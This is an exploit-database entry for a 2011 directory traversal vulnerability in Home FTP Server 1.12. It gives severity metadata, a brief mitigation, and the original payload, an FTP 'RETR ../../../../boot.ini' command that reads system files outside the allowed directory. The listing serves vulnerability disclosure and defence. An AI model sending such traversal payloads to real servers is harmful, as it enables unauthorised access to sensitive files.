header-logo
Suggest Exploit
vendor:
Home FTP Server
by:
clshack
7.5
CVSS
HIGH
Directory Traversal
22
CWE
Product Name: Home FTP Server
Affected Version From: 1.12
Affected Version To: 1.12
Patch Exists: NO
Related CWE: N/A
CPE: a:home_ftp_server:home_ftp_server:1.12
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP SP3 EN
2011

Home FTP SERVER 1.12 Directory Traversal

An attacker can send a malicious RETR command to the vulnerable FTP server, such as 'RETR ../../../../boot.ini', to traverse the directory and access sensitive files outside the web root directory.

Mitigation:

Ensure that the FTP server is configured to restrict access to only the necessary directories and files.
Source

Exploit-DB raw data:

# Exploit Title:Home FTP SERVER 1.12 Directory Traversal
# Date:28/2/2011
# Author: clshack
# Software Link:http://downstairs.dnsalias.net/homeftpserver.html
# Version:1.12
# Tested on: windows xp sp3 en
# CVE :

Send:

RETR ../../../../boot.ini

or other...

Twitter:clshackblog

Navigation

Suggest Exploit

Services By CQR